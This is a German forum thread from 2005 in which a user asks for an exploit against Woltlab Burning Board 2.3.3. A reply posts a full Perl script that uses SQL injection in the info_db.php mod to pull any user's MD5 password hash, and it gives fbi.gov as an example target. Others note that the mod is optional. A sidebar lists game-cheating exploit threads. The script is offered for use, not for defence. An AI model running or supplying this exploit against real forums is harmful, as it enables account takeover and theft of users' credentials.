|
You last visited: Today at 21:54
Advertisement
wbb 2.3.3 exploit
Discussion on wbb 2.3.3 exploit within the Tutorials forum part of the Off-Topics category.
09/18/2005, 15:26
|
#1
|
elite*gold: 0
Join Date: Apr 2005
Posts: 22
Received Thanks: 0
|
hi,
bin auf der suche nach nem wbb 2.3.3 exploit, kann aber per google keinen finden kann mir jemand weiter helfen?
|
|
|
09/18/2005, 23:34
|
#2
|
elite*gold: 0
Join Date: Jan 2005
Posts: 3,110
Received Thanks: 220
|
|
|
|
09/21/2005, 12:30
|
#3
|
elite*gold: 0
Join Date: Jul 2005
Posts: 700
Received Thanks: 19
|
Für wbb2.3.3 gibt es noch keine Exploits, zumindestens noch nich public.
|
|
|
12/22/2005, 04:09
|
#4
|
elite*gold: 0
Join Date: May 2005
Posts: 67
Received Thanks: 0
|
Quote:
Originally posted by skizer@Sep 21 2005, 11:30
Für wbb2.3.3 gibt es noch keine Exploits, zumindestens noch nich public.
|
dann bist du schlecht informiert
Code:
#!/usr/bin/perl -w
## Woltlab Burning Board <= 2.3.3 info_db.php SQL injection
##
## This perl script will fetch the MD5 hash from any wbb that is running with info_db.php
##
##
##
##
##
##
## written by [R]
## greetz fly out to the whole rootbox/batznet crew!
##
use LWP::Simple;
use strict;
use warnings;
my $target = $ARGV[0];
my $userid = $ARGV[1];
my $exploit = "/info_db.php?action=file&fileid=- 1%20UNION%20SELECT%20password,password,password,password,password,password,
password,password,password,password,password,password,password,password,pas
sword,password,password,password%20FROM%20bb1_users%20WHERE%20userid=$useri
d/*";
# different way of exploiting, see adv..;)
# my $exploit = "/info_db.php?action=file&fileid=59& subkatid=10'%20UNION%20SELECT%20password,password,password,password,passwor
d,password,password,password,password,password,password,password,password,p
assword,password,password,password,password,password,password,password,pass
word,password,password%20FROM%20bb1_users%20WHERE%20userid=$userid/*";
if ($target eq "" && $userid eq "") {
print "\nWoltlab Burning Board <= 2.3.3 info_db.php SQL injection\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "\nUsage:\n";
print "perl $0 [TARGET] [USERID]\n";
print "perl $0 fbi.gov/path/ 1\n\n";
exit();
}
print ("\n[+] Trying to exploit the target...");
sleep(10);
print ("\n[+] Ok - should be exploited!\n");
sleep(5);
my $hash = get "http://www.$target/$exploit";
$hash =~ s/<.*?>//sg; # clean the whole html code
$hash =~ s!\ !!g; # clean
$hash =~ s/©//g; # clean ©
print ("\n[+] Successfully exploited!\n");
print ("\n");
print ("[+] MD5 Hash: ");
print $hash =~ m/\b(\w{32})\b/; # get the hash
print ("\n\n");
exit();
|
|
|
12/22/2005, 09:18
|
#5
|
elite*gold: 0
Join Date: Jul 2005
Posts: 6
Received Thanks: 0
|
du bist auch schlecht informiert...
die info_db.php gehört zu nem mod ( (Database Mod))
und nich jedes 2.3.3 hat diesen mod drin :P
|
|
|
12/22/2005, 14:09
|
#6
|
elite*gold: 0
Join Date: Jul 2005
Posts: 700
Received Thanks: 19
|
Bzw gugg mal auf das Datum -_-
Quote:
#3 Posted: Sep 21 2005, 11:30
|
Das is nen bisschen länger her oder?...
---
Bitte alte topics nicht wieder "auferstehn" lassen, danke.
~regards skizer
|
|
|
|
Similar Threads
|
Guild Vault Exploit/Gpromote Exploit (working on 3.0.3 servers)
01/12/2009 - WoW PServer Exploits, Hacks & Tools - 1 Replies
Credits go to powerget23 from MM0wned
tested and confirmed, have fun XD
|
[Exploit] Human Illusion Exploit On 2.3.3
03/24/2008 - WoW Exploits, Hacks, Tools & Macros - 30 Replies
Alright this is simple it has a
22%Chance of not working on first try 100% on second
Step1:Get level 66
Step2:Get attuned to Durnehold Keep
Step3:Buy savory deviate delights.
Step4:Zone in on Durnhold Keep
Step5:Get to the keep
Step6:Now listen carfully attack the first elite mob you see with an arrow/spell(Anything ranged is better.) Now before the mob attacks you back use a savory deviate delight, now let yourself die, DO NOT ATTACK THE MOB A SECOND TIME!
Step7:Now if you noticed...
|
[Exploit][Arena]Kerzenständer Exploit
01/19/2008 - WoW Exploits, Hacks, Tools & Macros - 7 Replies
Guten Tag,
dieser Exploit geht nur in der Lorderon Arena. Im Vorbereitungsraum ist ein Kerzenständer und wenn man die gegner Feart in diesem Raum besteht eine Chacne (die nicht grade gering ist) das er im Fear hinter die Ständer läuft.
So habe ich schon einige Matches Gewonnen.
http://www.deinearmee.de/mull/kerzen.JPG
Gruß
Raa_de
|
Exploit - Re-Releaseing a exploit that got lost
01/11/2008 - WoW Exploits, Hacks, Tools & Macros - 0 Replies
In the outlands its a nifty trick to use. Ill post examples at the end of this explanation how you can use it for something usefull.
What this is is bugging mobs onto a plattform or ledge where they cant get down or better said you normaly are not suppose to get to, i.e. like mushrooms in zangamarsh or thos ledges in slavepens.
So what you must do, go onto your normaly unreachable ledge or mushroom and choose a mob below you, use a throwing weapon or clap your hands and jump around, just...
|
[Exploit]O2Jam Gold Exploit
08/28/2006 - General Gaming Discussion - 3 Replies
Make a new account and you get credited 10000g. Use that to buy items then send them to your main account, and repeat.
|
All times are GMT +2. The time now is 21:54.
|
|